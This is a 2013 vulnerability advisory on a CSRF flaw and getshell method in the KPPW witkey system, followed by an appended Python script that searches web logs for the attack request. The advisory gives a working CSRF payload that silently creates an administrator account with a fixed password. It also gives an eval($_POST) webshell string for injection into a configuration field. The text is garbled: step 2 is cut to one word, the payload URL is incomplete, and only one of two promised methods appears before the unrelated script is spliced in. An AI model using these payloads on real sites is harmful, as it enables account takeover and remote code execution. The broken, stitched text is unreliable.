Passenger passenger witkey system CSRF + getshell - vulnerability warning - the black bar safety net

ID MYHACK58:62201338632
Type myhack58
Reporter take
Modified 2013-05-06T00:00:00


1. Register a member account.

2. The

3. It is sent to the admin. The following is a CSRF payload; its purpose is to add an administrator account kppw with password kppwkppw:

<script src= php?do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword%5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw.com&fds%5Bgroup_id%5D=1&is_submit=1 ></script>

4. Two getshell methods

(1) With gpc off: in the global configuration, under member integration, change the UCENTER encoding to ');eval($_POST[a])?>;
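For triage of the CSRF request in step 3, the following added example (not part of the original advisory or the product's code) scans web access logs for the add-user form being submitted over GET, which is what a script tag load produces. The log format (Combined Log Format), the path `/PLACEHOLDER.php`, the host `site.example` and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status size "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

SAMPLE_LOG = [  # constructed lines; path, hosts and referers are placeholders
    '203.0.113.7 - - [06/May/2013:10:00:01 +0800] "GET /PLACEHOLDER.php?do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword%5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw.com&fds%5Bgroup_id%5D=1&is_submit=1 HTTP/1.1" 200 512 "http://site.example/PLACEHOLDER.php?do=msg" "Mozilla/5.0"',
    '203.0.113.7 - - [06/May/2013:10:00:05 +0800] "GET /PLACEHOLDER.php?do=user&view=list HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [06/May/2013:10:01:00 +0800] "POST /PLACEHOLDER.php?do=user&view=add HTTP/1.1" 200 300 "http://site.example/PLACEHOLDER.php?do=user&view=add" "Mozilla/5.0"',
]

def find_csrf_user_adds(lines, site_host):
    """Return one finding per GET request that submits the add-user form."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        # parse_qs percent-decodes keys, so fds%5Busername%5D becomes fds[username]
        q = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        first = lambda key: q.get(key, [""])[0]
        if (first("do"), first("view"), first("is_submit")) != ("user", "add", "1"):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None when the referer is "-"
        findings.append({
            "time": m["ts"],
            "client": m["ip"],
            "username": first("fds[username]"),          # account that was created
            "admin_group": first("fds[group_id]") == "1",
            # A same-site referer does not clear the request: the message
            # carrying the script tag may have been read inside the site.
            "cross_site": ref_host != site_host,
            "status": int(m["status"]),
        })
    return findings

if __name__ == "__main__":
    for finding in find_csrf_user_adds(SAMPLE_LOG, "site.example"):
        print(finding)
```

The password parameter is deliberately left out of the findings; any account reported with `admin_group` set should be checked against the list of administrators that were created on purpose.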